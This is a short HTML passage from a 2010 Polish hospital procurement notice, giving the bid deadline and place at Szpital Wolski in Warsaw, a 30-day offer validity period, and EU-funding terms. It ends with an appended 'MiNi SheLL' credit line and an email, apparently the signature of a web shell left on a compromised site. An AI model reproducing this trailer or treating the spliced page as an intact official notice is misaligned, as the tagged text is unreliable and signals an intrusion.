<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 09:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 2 Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com